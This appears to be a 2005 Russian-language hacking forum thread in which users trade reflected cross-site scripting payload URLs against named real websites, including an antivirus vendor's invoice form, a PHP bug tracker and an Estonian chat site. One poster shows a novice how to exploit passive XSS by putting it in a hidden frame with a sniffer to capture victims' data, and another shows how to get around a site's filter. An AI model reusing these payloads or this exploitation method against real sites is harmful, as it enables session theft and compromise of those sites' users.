 |
|
21.11.2005, 01:52
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами:
10937126
Репутация:
1316
|
|
|
|
|
21.11.2005, 19:43
|
|
Banned
Регистрация: 05.10.2005
Сообщений: 965
С нами:
10840706
Репутация:
547
|
|
k1b0rg
Вопрос лично к тебе, я в нахождение багов новичок, вот нашёл тут одну вешь, может подскажеш как им воспользоватся ?
http://www.mix.az/engine/modules/imagepreview.php?image='
|
|
|
|
21.11.2005, 20:47
|
|
Banned
Регистрация: 31.05.2005
Сообщений: 549
С нами:
11023586
Репутация:
16
|
|
Ну и какая ж там бага? =)
|
|
|
|
21.11.2005, 21:04
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами:
10937126
Репутация:
1316
|
|
вот бага
http://www.mix.az/engine/modules/imagepreview.php?image=');</script><script>alert()</script>
а как воспользоваться ,ищи в поиске "пассивные xss"
здесь описывать не буду, много, ды это прочитай а что непонятное спрашивай.
ОБНОВЛЕНИЕ
http://www.drweb.ru/buy/invoice/?computers=&period=1y&email=%22%3E%3Cscript%3Ealer t%281%29%3C%2Fscript%3E&phone=%22%3E%3Cscript%3Eal ert%282%29%3C%2Fscript%3E&j_address=%22%3E%3Cscrip t%3Ealert%283%29%3C%2Fscript%3E&m_address=%22%3E%3 Cscript%3Ealert%284%29%3C%2Fscript%3E&org=%22%3E%3 Cscript%3Ealert%285%29%3C%2Fscript%3E&kpp=%22%3E%3 Cscript%3Ealert(6)</script>¤cy=RUR&act=finish&prodid=01-D
http://www.multitran.ru/c/m.exe?HL=2...3C%2Fscript%3E
http://bugs.php.net/report.php?in%5B...n%5Bactres%5D=
http://www.cafepress.com/cp/search/s...cfpt=&x=26&y=8
http://www.phpbbhacks.com/searchresults.php?version=2"><script>alert()</script>&query=666&search_type=1&Submit=Go
http://www.tstyle.ru/price/1001636'
http://xrout.org/index.php поиск "><script>alert()</script>
http://www.etegro.com/rus/?module=items&id=22'"&text=1"><script>alert()</script>
Последний раз редактировалось k1b0rg; 21.11.2005 в 21:07..
|
|
|
|
21.11.2005, 22:17
|
|
Banned
Регистрация: 05.10.2005
Сообщений: 965
С нами:
10840706
Репутация:
547
|
|
Я искал, 3 часа но всё без успешно, нечего не нашёл, как юзать пасивный Xss. Может в аське поговорим ?
|
|
|
|
21.11.2005, 22:31
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами:
10937126
Репутация:
1316
|
|
Я искал, 3 часа но всё без успешно, нечего не нашёл, как юзать пасивный Xss. Может в аське поговорим ?
на почитай
http://dante.net.ru/forum/printthread.php?t=225
а так общий вид сводиться к тому, что имеется допустим твоя страничка, ставишь на нее два фрейма, один скрытый, в него помещаешь xss пасивную и сниффер.
это я тебе на "пальцах объяснил"
|
|
|
|
22.11.2005, 04:07
|
|
Познающий
Регистрация: 01.03.2005
Сообщений: 80
С нами:
11154714
Репутация:
12
|
|
|
|
|
|
22.11.2005, 07:41
|
|
Постоянный
Регистрация: 13.08.2004
Сообщений: 957
С нами:
11442626
Репутация:
429
|
|
Раньше тоже бегал искал потом понял.
Вот тебе XSS на твоем чате
http://www.superchat.ee/cgi-bin/00/User.Info?<script>alert(/XSS/)</script>&info
Последний раз редактировалось Morph; 22.11.2005 в 07:49..
|
|
|
|
22.11.2005, 13:36
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
С нами:
10937126
Репутация:
1316
|
|
http://www.superchat.ee/cgi-bin/gallery?cat=M&show="+style%3Dbackground:url(javasc ript:alert());"
вот тебе еще код
хаха, сделали защиту от =.
и ваще люди, когда вы говорите найдите мне уязвимость, то не надо потом кричать как ею воспользоваться!
|
|
|
|
22.11.2005, 13:42
|
|
Banned
Регистрация: 19.11.2005
Сообщений: 17
С нами:
10775846
Репутация:
1
|
|
Последний раз редактировалось Бафун; 22.11.2005 в 13:54..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
